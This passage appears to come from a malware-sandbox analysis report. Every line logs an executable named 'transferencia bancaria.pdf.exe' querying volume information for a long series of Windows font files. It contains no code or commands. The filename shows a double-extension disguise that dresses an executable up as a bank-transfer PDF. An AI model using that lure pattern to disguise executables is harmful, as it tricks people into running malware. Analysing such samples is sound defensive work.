Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exe	Queries volume information: C:\Windows\Fonts\segoeuiz.ttf VolumeInformation
Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exe	Queries volume information: C:\Windows\Fonts\seguibl.ttf VolumeInformation
Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exe	Queries volume information: C:\Windows\Fonts\seguibli.ttf VolumeInformation
Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exe	Queries volume information: C:\Windows\Fonts\seguiemj.ttf VolumeInformation
Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exe	Queries volume information: C:\Windows\Fonts\seguihis.ttf VolumeInformation
Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exe	Queries volume information: C:\Windows\Fonts\seguisym.ttf VolumeInformation
Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exe	Queries volume information: C:\Windows\Fonts\simsun.ttc VolumeInformation
Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exe	Queries volume information: C:\Windows\Fonts\simsunb.ttf VolumeInformation
Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exe	Queries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformation
Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exe	Queries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformation
Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exe	Queries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformation
Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exe	Queries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformation
Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exe	Queries volume information: C:\Windows\Fonts\sylfaen.ttf VolumeInformation
Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exe	Queries volume information: C:\Windows\Fonts\symbol.ttf VolumeInformation
Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exe	Queries volume information: C:\Windows\Fonts\tahoma.ttf VolumeInformation
Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exe	Queries volume information: C:\Windows\Fonts\tahomabd.ttf VolumeInformation
Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exe	Queries volume information: C:\Windows\Fonts\timesi.ttf VolumeInformation
Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exe	Queries volume information: C:\Windows\Fonts\timesbd.ttf VolumeInformation
Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exe	Queries volume information: C:\Windows\Fonts\timesbi.ttf VolumeInformation
Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exe	Queries volume information: C:\Windows\Fonts\trebuc.ttf VolumeInformation
Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exe	Queries volume information: C:\Windows\Fonts\trebucit.ttf VolumeInformation
Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exe	Queries volume information: C:\Windows\Fonts\trebucbd.ttf VolumeInformation
Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exe	Queries volume information: C:\Windows\Fonts\trebucbi.ttf VolumeInformation
Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exe	Queries volume information: C:\Windows\Fonts\verdana.ttf VolumeInformation
Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exe	Queries volume information: C:\Windows\Fonts\verdanai.ttf VolumeInformation
Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exe	Queries volume information: C:\Windows\Fonts\verdanab.ttf VolumeInformation
Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exe	Queries volume information: C:\Windows\Fonts\verdanaz.ttf VolumeInformation
Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exe	Queries volume information: C:\Windows\Fonts\webdings.ttf VolumeInformation
Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exe	Queries volume information: C:\Windows\Fonts\wingding.ttf VolumeInformation
Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exe	Queries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformation
Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exe	Queries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformation
Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exe	Queries volume information: C:\Windows\Fonts\YuGothL.ttc VolumeInformation
Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exe	Queries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformation
Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exe	Queries volume information: C:\Windows\Fonts\holomdl2.ttf VolumeInformation
Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exe	Queries volume information: C:\Windows\Fonts\CENTURY.TTF VolumeInformation
Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exe	Queries volume information: C:\Windows\Fonts\LEELAWAD.TTF VolumeInformation
Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exe	Queries volume information: C:\Windows\Fonts\LEELAWDB.TTF VolumeInformation
Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exe	Queries volume information: C:\Windows\Fonts\MSUIGHUR.TTF VolumeInformation
Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exe	Queries volume information: C:\Windows\Fonts\MSUIGHUB.TTF VolumeInformation
Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exe	Queries volume information: C:\Windows\Fonts\WINGDNG2.TTF VolumeInformation
Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exe	Queries volume information: C:\Windows\Fonts\WINGDNG3.TTF VolumeInformation
Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exe	Queries volume information: C:\Windows\Fonts\TEMPSITC.TTF VolumeInformation
Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exe	Queries volume information: C:\Windows\Fonts\PRISTINA.TTF VolumeInformation
Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exe	Queries volume information: C:\Windows\Fonts\PAPYRUS.TTF VolumeInformation
Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exe	Queries volume information: C:\Windows\Fonts\MISTRAL.TTF VolumeInformation
Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exe	Queries volume information: C:\Windows\Fonts\LHANDW.TTF VolumeInformation
Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exe	Queries volume information: C:\Windows\Fonts\ITCKRIST.TTF VolumeInformation
Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exe	Queries volume information: C:\Windows\Fonts\JUICE___.TTF VolumeInformation
Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exe	Queries volume information: C:\Windows\Fonts\FRSCRIPT.TTF VolumeInformation
Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exe	Queries volume information: C:\Windows\Fonts\FREESCPT.TTF VolumeInformation
Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exe	Queries volume information: C:\Windows\Fonts\BRADHITC.TTF VolumeInformation
Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exe	Queries volume information: C:\Windows\Fonts\OUTLOOK.TTF VolumeInformation
Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exe	Queries volume information: C:\Windows\Fonts\BKANT.TTF VolumeInformation
Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exe	Queries volume information: C:\Windows\Fonts\ANTQUAI.TTF VolumeInformation
Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exe	Queries volume information: C:\Windows\Fonts\ANTQUAB.TTF VolumeInformation
Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exe	Queries volume information: C:\Windows\Fonts\ANTQUABI.TTF VolumeInformation
Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exe	Queries volume information: C:\Windows\Fonts\GARA.TTF VolumeInformation
Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exe	Queries volume information: C:\Windows\Fonts\GARAIT.TTF VolumeInformation
Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exe	Queries volume information: C:\Windows\Fonts\GARABD.TTF VolumeInformation
Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exe	Queries volume information: C:\Windows\Fonts\MTCORSVA.TTF VolumeInformation
Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exe	Queries volume information: C:\Windows\Fonts\GOTHIC.TTF VolumeInformation
Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exe	Queries volume information: C:\Windows\Fonts\GOTHICI.TTF VolumeInformation
Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exe	Queries volume information: C:\Windows\Fonts\GOTHICB.TTF VolumeInformation
Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exe	Queries volume information: C:\Windows\Fonts\GOTHICBI.TTF VolumeInformation
Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exe	Queries volume information: C:\Windows\Fonts\ALGER.TTF VolumeInformation
Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exe	Queries volume information: C:\Windows\Fonts\BASKVILL.TTF VolumeInformation
Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exe	Queries volume information: C:\Windows\Fonts\BAUHS93.TTF VolumeInformation
Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exe	Queries volume information: C:\Windows\Fonts\BELL.TTF VolumeInformation
Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exe	Queries volume information: C:\Windows\Fonts\BELLI.TTF VolumeInformation
Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exe	Queries volume information: C:\Windows\Fonts\BELLB.TTF VolumeInformation
Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exe	Queries volume information: C:\Windows\Fonts\BRLNSR.TTF VolumeInformation
Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exe	Queries volume information: C:\Windows\Fonts\BRLNSDB.TTF VolumeInformation
Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exe	Queries volume information: C:\Windows\Fonts\BRLNSB.TTF VolumeInformation
Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exe	Queries volume information: C:\Windows\Fonts\BERNHC.TTF VolumeInformation
Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exe	Queries volume information: C:\Windows\Fonts\BOD_PSTC.TTF VolumeInformation
Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exe	Queries volume information: C:\Windows\Fonts\BRITANIC.TTF VolumeInformation
Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exe	Queries volume information: C:\Windows\Fonts\BROADW.TTF VolumeInformation
Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exe	Queries volume information: C:\Windows\Fonts\BRUSHSCI.TTF VolumeInformation
Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exe	Queries volume information: C:\Windows\Fonts\CALIFR.TTF VolumeInformation
Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exe	Queries volume information: C:\Windows\Fonts\CALIFI.TTF VolumeInformation
Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exe	Queries volume information: C:\Windows\Fonts\CALIFB.TTF VolumeInformation
Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exe	Queries volume information: C:\Windows\Fonts\CENTAUR.TTF VolumeInformation
Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exe	Queries volume information: C:\Windows\Fonts\CHILLER.TTF VolumeInformation
Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exe	Queries volume information: C:\Windows\Fonts\COLONNA.TTF VolumeInformation
Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exe	Queries volume information: C:\Windows\Fonts\COOPBL.TTF VolumeInformation
Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exe	Queries volume information: C:\Windows\Fonts\FTLTLT.TTF VolumeInformation
Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exe	Queries volume information: C:\Windows\Fonts\HARLOWSI.TTF VolumeInformation
Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exe	Queries volume information: C:\Windows\Fonts\HARNGTON.TTF VolumeInformation
Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exe	Queries volume information: C:\Windows\Fonts\HTOWERT.TTF VolumeInformation
Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exe	Queries volume information: C:\Windows\Fonts\HTOWERTI.TTF VolumeInformation
Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exe	Queries volume information: C:\Windows\Fonts\JOKERMAN.TTF VolumeInformation
Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exe	Queries volume information: C:\Windows\Fonts\KUNSTLER.TTF VolumeInformation
Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exe	Queries volume information: C:\Windows\Fonts\LBRITE.TTF VolumeInformation
Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exe	Queries volume information: C:\Windows\Fonts\LBRITED.TTF VolumeInformation
Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exe	Queries volume information: C:\Windows\Fonts\LBRITEI.TTF VolumeInformation
Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exe	Queries volume information: C:\Windows\Fonts\LBRITEDI.TTF VolumeInformation
Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exe	Queries volume information: C:\Windows\Fonts\LCALLIG.TTF VolumeInformation
Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exe	Queries volume information: C:\Windows\Fonts\LFAX.TTF VolumeInformation
Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exe	Queries volume information: C:\Windows\Fonts\LFAXD.TTF VolumeInformation
Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exe	Queries volume information: C:\Windows\Fonts\LFAXI.TTF VolumeInformation
Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exe	Queries volume information: C:\Windows\Fonts\LFAXDI.TTF VolumeInformation
Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exe	Queries volume information: C:\Windows\Fonts\MAGNETOB.TTF VolumeInformation
Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exe	Queries volume information: C:\Windows\Fonts\MATURASC.TTF VolumeInformation
Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exe	Queries volume information: C:\Windows\Fonts\MOD20.TTF VolumeInformation
Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exe	Queries volume information: C:\Windows\Fonts\NIAGENG.TTF VolumeInformation
Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exe	Queries volume information: C:\Windows\Fonts\NIAGSOL.TTF VolumeInformation
Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exe	Queries volume information: C:\Windows\Fonts\OLDENGL.TTF VolumeInformation
Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exe	Queries volume information: C:\Windows\Fonts\ONYX.TTF VolumeInformation
Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exe	Queries volume information: C:\Windows\Fonts\PARCHM.TTF VolumeInformation
Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exe	Queries volume information: C:\Windows\Fonts\PLAYBILL.TTF VolumeInformation
Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exe	Queries volume information: C:\Windows\Fonts\POORICH.TTF VolumeInformation
Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exe	Queries volume information: C:\Windows\Fonts\RAVIE.TTF VolumeInformation
Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exe	Queries volume information: C:\Windows\Fonts\INFROMAN.TTF VolumeInformation
Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exe	Queries volume information: C:\Windows\Fonts\SHOWG.TTF VolumeInformation
Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exe	Queries volume information: C:\Windows\Fonts\SNAP____.TTF VolumeInformation
Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exe	Queries volume information: C:\Windows\Fonts\STENCIL.TTF VolumeInformation
Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exe	Queries volume information: C:\Windows\Fonts\VINERITC.TTF VolumeInformation
Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exe	Queries volume information: C:\Windows\Fonts\VIVALDII.TTF VolumeInformation
Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exe	Queries volume information: C:\Windows\Fonts\VLADIMIR.TTF VolumeInformation
Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exe	Queries volume information: C:\Windows\Fonts\LATINWD.TTF VolumeInformation
Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exe	Queries volume information: C:\Windows\Fonts\TCM_____.TTF VolumeInformation
Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exe	Queries volume information: C:\Windows\Fonts\TCMI____.TTF VolumeInformation
Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exe	Queries volume information: C:\Windows\Fonts\TCB_____.TTF VolumeInformation
Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exe	Queries volume information: C:\Windows\Fonts\TCBI____.TTF VolumeInformation
Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exe	Queries volume information: C:\Windows\Fonts\TCCM____.TTF VolumeInformation
Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exe	Queries volume information: C:\Windows\Fonts\TCCB____.TTF VolumeInformation
Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exe	Queries volume information: C:\Windows\Fonts\TCCEB.TTF VolumeInformation
Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exe	Queries volume information: C:\Windows\Fonts\SCRIPTBL.TTF VolumeInformation
Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exe	Queries volume information: C:\Windows\Fonts\ROCK.TTF VolumeInformation
Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exe	Queries volume information: C:\Windows\Fonts\ROCKI.TTF VolumeInformation
Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exe	Queries volume information: C:\Windows\Fonts\ROCKB.TTF VolumeInformation
Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exe	Queries volume information: C:\Windows\Fonts\ROCKEB.TTF VolumeInformation
Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exe	Queries volume information: C:\Windows\Fonts\ROCKBI.TTF VolumeInformation
Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exe	Queries volume information: C:\Windows\Fonts\ROCC____.TTF VolumeInformation
Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exe	Queries volume information: C:\Windows\Fonts\ROCCB___.TTF VolumeInformation
Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exe	Queries volume information: C:\Windows\Fonts\RAGE.TTF VolumeInformation
Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exe	Queries volume information: C:\Windows\Fonts\PERTILI.TTF VolumeInformation
Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exe	Queries volume information: C:\Windows\Fonts\PERTIBD.TTF VolumeInformation
Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exe	Queries volume information: C:\Windows\Fonts\PER_____.TTF VolumeInformation
Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exe	Queries volume information: C:\Windows\Fonts\PERI____.TTF VolumeInformation
Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exe	Queries volume information: C:\Windows\Fonts\PERB____.TTF VolumeInformation
Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exe	Queries volume information: C:\Windows\Fonts\PERBI___.TTF VolumeInformation
Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exe	Queries volume information: C:\Windows\Fonts\PALSCRI.TTF VolumeInformation
Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exe	Queries volume information: C:\Windows\Fonts\OCRAEXT.TTF VolumeInformation
Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exe	Queries volume information: C:\Windows\Fonts\MAIAN.TTF VolumeInformation
Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exe	Queries volume information: C:\Windows\Fonts\LTYPE.TTF VolumeInformation
Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exe	Queries volume information: C:\Windows\Fonts\LTYPEO.TTF VolumeInformation
Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exe	Queries volume information: C:\Windows\Fonts\LTYPEB.TTF VolumeInformation
Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exe	Queries volume information: C:\Windows\Fonts\LTYPEBO.TTF VolumeInformation
Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exe	Queries volume information: C:\Windows\Fonts\LSANS.TTF VolumeInformation
Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exe	Queries volume information: C:\Windows\Fonts\LSANSD.TTF VolumeInformation
Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exe	Queries volume information: C:\Windows\Fonts\LSANSI.TTF VolumeInformation
Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exe	Queries volume information: C:\Windows\Fonts\LSANSDI.TTF VolumeInformation
Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exe	Queries volume information: C:\Windows\Fonts\IMPRISHA.TTF VolumeInformation
Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exe	Queries volume information: C:\Windows\Fonts\HATTEN.TTF VolumeInformation
Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exe	Queries volume information: C:\Windows\Fonts\GOUDYSTO.TTF VolumeInformation
Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exe	Queries volume information: C:\Windows\Fonts\GOUDOS.TTF VolumeInformation
Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exe	Queries volume information: C:\Windows\Fonts\GOUDOSI.TTF VolumeInformation
Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exe	Queries volume information: C:\Windows\Fonts\GOUDOSB.TTF VolumeInformation
Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exe	Queries volume information: C:\Windows\Fonts\GLECB.TTF VolumeInformation
Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exe	Queries volume information: C:\Windows\Fonts\GIL_____.TTF VolumeInformation
Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exe	Queries volume information: C:\Windows\Fonts\GILI____.TTF VolumeInformation
Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exe	Queries volume information: C:\Windows\Fonts\GILB____.TTF VolumeInformation
Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exe	Queries volume information: C:\Windows\Fonts\GILBI___.TTF VolumeInformation
Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exe	Queries volume information: C:\Windows\Fonts\GILC____.TTF VolumeInformation
Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exe	Queries volume information: C:\Windows\Fonts\GLSNECB.TTF VolumeInformation
Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exe	Queries volume information: C:\Windows\Fonts\GIGI.TTF VolumeInformation
Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exe	Queries volume information: C:\Windows\Fonts\FRABK.TTF VolumeInformation
Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exe	Queries volume information: C:\Windows\Fonts\FRABKIT.TTF VolumeInformation
Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exe	Queries volume information: C:\Windows\Fonts\FORTE.TTF VolumeInformation
Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exe	Queries volume information: C:\Windows\Fonts\FELIXTI.TTF VolumeInformation
Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exe	Queries volume information: C:\Windows\Fonts\ERASMD.TTF VolumeInformation
Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exe	Queries volume information: C:\Windows\Fonts\ERASLGHT.TTF VolumeInformation
Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exe	Queries volume information: C:\Windows\Fonts\ERASDEMI.TTF VolumeInformation
Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exe	Queries volume information: C:\Windows\Fonts\ERASBD.TTF VolumeInformation
Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exe	Queries volume information: C:\Windows\Fonts\ENGR.TTF VolumeInformation
Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exe	Queries volume information: C:\Windows\Fonts\ELEPHNT.TTF VolumeInformation
Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exe	Queries volume information: C:\Windows\Fonts\ELEPHNTI.TTF VolumeInformation
Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exe	Queries volume information: C:\Windows\Fonts\ITCEDSCR.TTF VolumeInformation
Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exe	Queries volume information: C:\Windows\Fonts\CURLZ___.TTF VolumeInformation
Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exe	Queries volume information: C:\Windows\Fonts\COPRGTL.TTF VolumeInformation
Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exe	Queries volume information: C:\Windows\Fonts\COPRGTB.TTF VolumeInformation
Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exe	Queries volume information: C:\Windows\Fonts\CENSCBK.TTF VolumeInformation
Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exe	Queries volume information: C:\Windows\Fonts\SCHLBKI.TTF VolumeInformation
Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exe	Queries volume information: C:\Windows\Fonts\SCHLBKB.TTF VolumeInformation
Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exe	Queries volume information: C:\Windows\Fonts\SCHLBKBI.TTF VolumeInformation
Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exe	Queries volume information: C:\Windows\Fonts\CASTELAR.TTF VolumeInformation
Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exe	Queries volume information: C:\Windows\Fonts\CALIST.TTF VolumeInformation
Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exe	Queries volume information: C:\Windows\Fonts\CALISTI.TTF VolumeInformation
Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exe	Queries volume information: C:\Windows\Fonts\CALISTB.TTF VolumeInformation
Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exe	Queries volume information: C:\Windows\Fonts\CALISTBI.TTF VolumeInformation
Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exe	Queries volume information: C:\Windows\Fonts\BOOKOS.TTF VolumeInformation
Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exe	Queries volume information: C:\Windows\Fonts\BOOKOSB.TTF VolumeInformation
Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exe	Queries volume information: C:\Windows\Fonts\BOOKOSI.TTF VolumeInformation
Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exe	Queries volume information: C:\Windows\Fonts\BOOKOSBI.TTF VolumeInformation
Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exe	Queries volume information: C:\Windows\Fonts\BOD_R.TTF VolumeInformation
Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exe	Queries volume information: C:\Windows\Fonts\BOD_I.TTF VolumeInformation
Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exe	Queries volume information: C:\Windows\Fonts\BOD_B.TTF VolumeInformation
Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exe	Queries volume information: C:\Windows\Fonts\BOD_BI.TTF VolumeInformation
Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exe	Queries volume information: C:\Windows\Fonts\BOD_CR.TTF VolumeInformation
Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exe	Queries volume information: C:\Windows\Fonts\BOD_BLAR.TTF VolumeInformation
Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exe	Queries volume information: C:\Windows\Fonts\BOD_CI.TTF VolumeInformation
Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exe	Queries volume information: C:\Windows\Fonts\BOD_CB.TTF VolumeInformation
Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exe	Queries volume information: C:\Windows\Fonts\BOD_BLAI.TTF VolumeInformation
Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exe	Queries volume information: C:\Windows\Fonts\BOD_CBI.TTF VolumeInformation
Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exe	Queries volume information: C:\Windows\Fonts\ITCBLKAD.TTF VolumeInformation
Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exe	Queries volume information: C:\Windows\Fonts\ARLRDBD.TTF VolumeInformation
Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exe	Queries volume information: C:\Windows\Fonts\AGENCYR.TTF VolumeInformation
Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exe	Queries volume information: C:\Windows\Fonts\AGENCYB.TTF VolumeInformation
Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exe	Queries volume information: C:\Windows\Fonts\BSSYM7.TTF VolumeInformation
Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exe	Queries volume information: C:\Windows\Fonts\REFSAN.TTF VolumeInformation
Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exe	Queries volume information: C:\Windows\Fonts\REFSPCL.TTF VolumeInformation
Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exe	Queries volume information: C:\Windows\Fonts\MTEXTRA.TTF VolumeInformation
Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exe	Queries volume information: C:\Windows\Fonts\marlett.ttf VolumeInformation
Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exe	Queries volume information: C:\Windows\Fonts\ARIALN.TTF VolumeInformation
Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exe	Queries volume information: C:\Windows\Fonts\ARIALNI.TTF VolumeInformation
Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exe	Queries volume information: C:\Windows\Fonts\ARIALNB.TTF VolumeInformation
Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exe	Queries volume information: C:\Windows\Fonts\ARIALNBI.TTF VolumeInformation
